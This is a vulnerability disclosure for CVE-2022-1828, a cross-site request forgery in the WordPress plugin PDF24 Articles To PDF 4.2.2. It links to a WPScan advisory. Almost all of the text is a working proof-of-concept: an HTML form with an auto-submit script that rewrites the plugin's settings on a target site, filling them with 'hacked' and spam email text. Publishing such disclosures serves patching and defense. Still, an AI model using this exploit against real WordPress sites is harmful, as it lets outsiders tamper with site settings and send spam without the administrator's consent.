CVE: CVE-2022-1828

Name: PDF24 Articles To PDF (pdf24-posts-to-pdf)

Version: 4.2.2

Date: 2022-04-21 16:53:39

Advisory: https://wpscan.com/vulnerability/877ce7a5-b1ff-4d03-9cd8-6beed5595af8

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=pdf24" method="POST">
    <input type="text" name="language" value="en">
    <input type="text" name="availability" value="public">
    <input type="text" name="contentCompression" value="on">
    <input type="text" name="docOptionsInUse" value="on">
    <input type="text" name="docHeader" value="hacked">
    <input type="text" name="docSize" value="A4">
    <input type="text" name="docOrientation" value="portrait">
    <input type="text" name="docStyle" value="">
    <input type="text" name="docDefaultFilename" value="">
    <input type="text" name="docHomeFilename" value="">
    <input type="text" name="docSingleFilename" value="">
    <input type="text" name="docPageFilename" value="">
    <input type="text" name="docCategoryFilename" value="">
    <input type="text" name="docSearchFilename" value="">
    <input type="text" name="emailOptionsInUse" value="on">
    <input type="text" name="emailType" value="text/plain">
    <input type="text" name="emailSubject" value="hacked">
    <input type="text" name="emailFrom" value="hacked">
    <input type="text" name="emailText" value="please buy my rolex">
    <input type="text" name="cpInUse" value="on">
    <input type="text" name="cpDisplayMode" value="bottom">
    <input type="text" name="cpStyle" value="default_elbf">
    <textarea name="cpCustomStyle">.pdf24Plugin-cp {
	border:1px solid silver;
}

.pdf24Plugin-cp input[type="text"] {
	width:200px;
	border:1px solid silver;
	margin:0;
	padding:2px;
}

.pdf24Plugin-cp input[type="submit"] {
	margin:0;
	padding:2px 10px !important;
}

.pdf24Plugin-cp form {
	margin:0;
	padding:0;
}

.pdf24Plugin-cp img {
	height:32px;
}

.pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img {
	vertical-align:middle;
}

.pdf24Plugin-cp * {
	font-size:90%;
}</textarea>
    <input type="text" name="sbpInUse" value="on">
    <input type="text" name="sbpStyle" value="default_dsbfl">
    <textarea name="sbpCustomStyle">.pdf24Plugin-sbp {
	text-align:center;
	border: 1px solid silver;
	padding: 5px;
}
.pdf24Plugin-sbp-link a {
	font-weight:bold;
}
.pdf24Plugin-sbp-bl {
	font-size:smaller;
}</textarea>
    <input type="text" name="tbpStyle" value="default_dflb">
    <textarea name="tbpCustomStyle">.pdf24Plugin-tbp {
	padding: 3px;
	width:600px;
	margin:auto;
}
.pdf24Plugin-tbp * {
	font-size: 90%;
}</textarea>
    <input type="text" name="lpStyle" value="default_dfl">
    <textarea name="lpCustomStyle">.pdf24Plugin-lp-link a {
}</textarea>
    <input type="text" name="lang-enterEmail" value="Enter email address">
    <input type="text" name="lang-send" value="Send">
    <input type="text" name="lang-sendArticleAsPDF" value="Send article as PDF">
    <input type="text" name="lang-sendArticlesAsPDF" value="Send articles as PDF">
    <input type="text" name="lang-downloadArticleAsPDF" value="Download article as PDF">
    <input type="text" name="lang-downloadArticlesAsPDF" value="Download articles as PDF">
    <input type="text" name="lang-createPDF" value="Create PDF">
    <textarea name="docTpl"><html>
<head>
	<base href="{baseUrl}" />
	<title>{headline}</title>
	<meta http-equiv="content-type" content="text/html; charset={charset}" />	
	<style type="text/css">
		{css}
	</style>
</head>
<body>
	<h1><a href="{headlineUrl}">{headline}</a></h1>
	<div>{content}</div>
</body>
</html></textarea>
    <textarea name="docEntryTpl"><div class="bodyPart">
	<h2><a href="{url}">{title}</a></h2>
	<div class="meta">{dateTime} &nbsp; {author}</div>
	<div class="text">{text}</div>
</div></textarea>
    <input type="text" name="update" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>